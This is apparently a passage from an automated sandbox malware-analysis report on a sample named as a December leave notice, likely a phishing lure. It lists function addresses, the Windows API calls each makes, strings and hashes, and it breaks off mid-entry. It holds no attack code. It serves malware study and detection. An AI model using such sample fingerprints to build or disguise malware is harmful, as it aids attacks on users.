                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: 8e52ae71869d8d5fe0041caeb96d148afb88ef1dffa3c071f915978fe25de36d
                                                      • Instruction ID: 0424a7a1aea1a834adfae36fcbb78fa57ea6bbc78e0c71403ec8c1bf61f256c3
                                                      • Opcode Fuzzy Hash: 8e52ae71869d8d5fe0041caeb96d148afb88ef1dffa3c071f915978fe25de36d
                                                      • Instruction Fuzzy Hash: 50917F342087419BDB05FF21CC51AAEB7A5BF94310F04485DF8965B392DB78ED0AEB91
                                                      Function 00FEE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FEE5AB
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FEBEAF), ref: 00FEE607
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FEE647
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FEE68C
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FEE6C3
                                                      • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00FEBEAF), ref: 00FEE6CF
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FEE6DF
                                                      • DestroyIcon.USER32(?,?,?,?,?,00FEBEAF), ref: 00FEE6EE
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FEE70B
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FEE717
                                                        • Part of subcall function 00FA0FA7: __wcsicmp_l.LIBCMT ref: 00FA1030
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 1212759294-1154884017
                                                      • Opcode ID: 1bc3a85d593f59f2d124a4522f6c119fc37356fcb938c8187b6c6ca046d02a3e
                                                      • Instruction ID: 9484e1d84bc9d1a3356d0f427d1aaddf543c6ef331a1cd7f608409189aca2738
                                                      • Opcode Fuzzy Hash: 1bc3a85d593f59f2d124a4522f6c119fc37356fcb938c8187b6c6ca046d02a3e
                                                      • Instruction Fuzzy Hash: 29612171910254BAEB20DFA5EC46FFE77A8BF08724F104105F911E60C0EB799980EB60
                                                      Function 00FCD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • CharLowerBuffW.USER32(?,?), ref: 00FCD292
                                                      • GetDriveTypeW.KERNEL32 ref: 00FCD2DF
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FCD327
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FCD35E
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FCD38C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 1148790751-4113822522
                                                      • Opcode ID: c086ad9d71da76ccfd3319d4ea856c506e843b21143f2a164c13ea129bd49fcd
                                                      • Instruction ID: 4743b479e853a7bbcc7ad8dc463b319ee7424b333dbff6f8e1c0b38af19e15f6
                                                      • Opcode Fuzzy Hash: c086ad9d71da76ccfd3319d4ea856c506e843b21143f2a164c13ea129bd49fcd
                                                      • Instruction Fuzzy Hash: 6D512A71504605AFC704EF20CD829AEB7E8FF98758F00486DF8996B251DB35EE06DB92
                                                      Function 00FC26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00FF3973,00000016,0000138C,00000016,?,00000016,0101DDB4,00000000,?), ref: 00FC26F1
                                                      • LoadStringW.USER32(00000000,?,00FF3973,00000016), ref: 00FC26FA
                                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00FF3973,00000016,0000138C,00000016,?,00000016,0101DDB4,00000000,?,00000016), ref: 00FC271C
                                                      • LoadStringW.USER32(00000000,?,00FF3973,00000016), ref: 00FC271F
                                                      • __swprintf.LIBCMT ref: 00FC276F
                                                      • __swprintf.LIBCMT ref: 00FC2780
                                                      • _wprintf.LIBCMT ref: 00FC2829
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FC2840
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 618562835-2268648507
                                                      • Opcode ID: adf27fcdcb4a9b2edcc6cc542d4ed01189acff3f6e655a2fe6dd3754397be6a4
                                                      • Instruction ID: df307a382e84a658833c585d92e4534d21055c8954debaed487f7720acc00d93
                                                      • Opcode Fuzzy Hash: adf27fcdcb4a9b2edcc6cc542d4ed01189acff3f6e655a2fe6dd3754397be6a4
                                                      • Instruction Fuzzy Hash: 48414072900519ABCB15FBE0DE87EEEB778EF54740F100069B50176092DA396F49EBA0
                                                      Function 00FCD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FCD0D8
                                                      • __swprintf.LIBCMT ref: 00FCD0FA
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00FCD137
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FCD15C
                                                      • _memset.LIBCMT ref: 00FCD17B
                                                      • _wcsncpy.LIBCMT ref: 00FCD1B7
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FCD1EC
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FCD1F7
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00FCD200
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FCD20A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: a79c5bf7ba3643b1d2f9e02a1ae7199701103455cb639221a4744ac810f68d0b
                                                      • Instruction ID: 8066a433330e71852b081e3e9bfc63c6c026cb62143cb6a12507538fe807af6f
                                                      • Opcode Fuzzy Hash: a79c5bf7ba3643b1d2f9e02a1ae7199701103455cb639221a4744ac810f68d0b
                                                      • Instruction Fuzzy Hash: 48319CB291020AABDB21DFA0DC49FEF77BCAF89710F1041BAF509D2155EB7496449B34
                                                      Function 00FEE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00FEBEF4,?,?), ref: 00FEE754
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE76B
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE776
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE783
                                                      • GlobalLock.KERNEL32(00000000), ref: 00FEE78C
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE79B
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00FEE7A4
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE7AB
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FEBEF4,?,?,00000000,?), ref: 00FEE7BC
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,0100D9BC,?), ref: 00FEE7D5
                                                      • GlobalFree.KERNEL32(00000000), ref: 00FEE7E5
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00FEE809
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00FEE834
                                                      • DeleteObject.GDI32(00000000), ref: 00FEE85C
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00FEE872
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 1bce1f23b576cf1db64726ea4d116b22200f944418467b5de9d0353090bc50ae
                                                      • Instruction ID: 3188877fc378dd83520f3bf2ba8d0c61d53bcb1304294b6908854de562a1e1a2
                                                      • Opcode Fuzzy Hash: 1bce1f23b576cf1db64726ea4d116b22200f944418467b5de9d0353090bc50ae
                                                      • Instruction Fuzzy Hash: B0415B75600205FFDB229FE5DC48EAA7BB9EF89721F108058F949D7250D7359D40DB20
                                                      Function 00FD05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 00FD076F
                                                      • _wcscat.LIBCMT ref: 00FD0787
                                                      • _wcscat.LIBCMT ref: 00FD0799
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FD07AE
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD07C2
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00FD07DA
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FD07F4
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FD0806
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      • Opcode ID: 8fc5cefa63ce8deda33181897047888ce11aba3f67e24dfa4aaf0bc2d5ca41ca
                                                      • Instruction ID: ef2d118be1576d1db6a1b434c74b8978f42a103d5e322b1df45d103ec6c86a00
                                                      • Opcode Fuzzy Hash: 8fc5cefa63ce8deda33181897047888ce11aba3f67e24dfa4aaf0bc2d5ca41ca
                                                      • Instruction Fuzzy Hash: B28193729043059FCB24EF64C845A6EB7E9BBC4314F18882FF485C7351EB35D944AB52
                                                      Function 00FEEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F9B34E: GetWindowLongW.USER32(?,000000EB), ref: 00F9B35F
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FEEF3B
                                                      • GetFocus.USER32 ref: 00FEEF4B
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00FEEF56
                                                      • _memset.LIBCMT ref: 00FEF081
                                                      • GetMenuItemInfoW.USER32 ref: 00FEF0AC
                                                      • GetMenuItemCount.USER32(00000000), ref: 00FEF0CC
                                                      • GetMenuItemID.USER32(?,00000000), ref: 00FEF0DF
                                                      • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00FEF113
                                                      • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00FEF15B
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00FEF193
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00FEF1C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: f6164586275bb952b356a3df40cef666fdfa4f225a816389f9c674cbd55186e8
                                                      • Instruction ID: 57b376e16b528b4706989c260811b5587f5acda7fe761394d0c1128da08f010d
                                                      • Opcode Fuzzy Hash: f6164586275bb952b356a3df40cef666fdfa4f225a816389f9c674cbd55186e8
                                                      • Instruction Fuzzy Hash: D981C371608385EFD720CF56D884A6BBBE4FF88324F10452EF99897291D735D805EBA2
                                                      Function 00FBA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FBABD7
                                                        • Part of subcall function 00FBABBB: GetLastError.KERNEL32(?,00FBA69F,?,?,?), ref: 00FBABE1
                                                        • Part of subcall function 00FBABBB: GetProcessHeap.KERNEL32(00000008,?,?,00FBA69F,?,?,?), ref: 00FBABF0
                                                        • Part of subcall function 00FBABBB: HeapAlloc.KERNEL32(00000000,?,00FBA69F,?,?,?), ref: 00FBABF7
                                                        • Part of subcall function 00FBABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FBAC0E
                                                        • Part of subcall function 00FBAC56: GetProcessHeap.KERNEL32(00000008,00FBA6B5,00000000,00000000,?,00FBA6B5,?), ref: 00FBAC62
                                                        • Part of subcall function 00FBAC56: HeapAlloc.KERNEL32(00000000,?,00FBA6B5,?), ref: 00FBAC69
                                                        • Part of subcall function 00FBAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FBA6B5,?), ref: 00FBAC7A
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FBA8CB
                                                      • _memset.LIBCMT ref: 00FBA8E0
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FBA8FF
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA910
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FBA94D
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FBA969
                                                      • GetLengthSid.ADVAPI32(?), ref: 00FBA986
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FBA995
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FBA99C
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FBA9BD
                                                      • CopySid.ADVAPI32(00000000), ref: 00FBA9C4
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FBA9F5
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FBAA1B
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FBAA2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: fe4dfd9a754e09006b06d687cf23180a3817eeacb0825e8b2fb56434cc516bdf
                                                      • Instruction ID: 216c4fb65ff330fae1f9c65a554d624cf4ecb9bb61845147c3d36dd31927268e
                                                      • Opcode Fuzzy Hash: fe4dfd9a754e09006b06d687cf23180a3817eeacb0825e8b2fb56434cc516bdf
                                                      • Instruction Fuzzy Hash: BC5148B1900209AFDF15DFA1DD85AEEBBB9FF04310F048129F955A6280DB399A05EF61
                                                      Function 00FD9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00FD9E36
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00FD9E42
                                                      • CreateCompatibleDC.GDI32(?), ref: 00FD9E4E
                                                      • SelectObject.GDI32(00000000,?), ref: 00FD9E5B
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00FD9EAF
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00FD9EEB
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00FD9F0F
                                                      • SelectObject.GDI32(00000006,?), ref: 00FD9F17
                                                      • DeleteObject.GDI32(?), ref: 00FD9F20
                                                      • DeleteDC.GDI32(00000006), ref: 00FD9F27
                                                      • ReleaseDC.USER32(00000000,?), ref: 00FD9F32
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 3ee162936e0bd5559f6940ad9f770b651c949cd333e3f1cbe8f273a93c66d58f
                                                      • Instruction ID: a56466681a4fc85c0c81e1976eea0c4d59e8369eeb5fba766624cb8420599212
                                                      • Opcode Fuzzy Hash: 3ee162936e0bd5559f6940ad9f770b651c949cd333e3f1cbe8f273a93c66d58f
                                                      • Instruction Fuzzy Hash: 17514C75904309AFCB25CFE8C885EAEBBB9EF48310F14851DF99997300C775A840CB60
                                                      Function 00FCCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2889450990-2391861430
                                                      • Opcode ID: 1d2135851ffe996c4e0044efea73fc1c73d967468add504e18c91f35c982a285
                                                      • Instruction ID: 6f345fc5a9cd4b4bd482d10869716e2472b0c88232eaf2c2965a3f942d8ebc2d
                                                      • Opcode Fuzzy Hash: 1d2135851ffe996c4e0044efea73fc1c73d967468add504e18c91f35c982a285
                                                      • Instruction Fuzzy Hash: C0517F7190050AABCB15FBE0CE86EEEB778AF05304F10016AF50576052EB796E59EBA0
                                                      Function 00FCCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 2889450990-3420473620
                                                      • Opcode ID: ecac2f146bbaf94cad844dc633a7f467f8636e5ef053658ead229def02947fd5
                                                      • Instruction ID: e876e58b7a2b762e774f533a5aeb99efea5a46f5ad17da7b60a777787a85b3cd
                                                      • Opcode Fuzzy Hash: ecac2f146bbaf94cad844dc633a7f467f8636e5ef053658ead229def02947fd5
                                                      • Instruction Fuzzy Hash: FE51717190050AABCF15FBE0CE87EEEB778AF04744F10006AF50576052EB796E59EBA1
                                                      Function 00FC55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC55D7
                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00FC5664
                                                      • GetMenuItemCount.USER32(01041708), ref: 00FC56ED
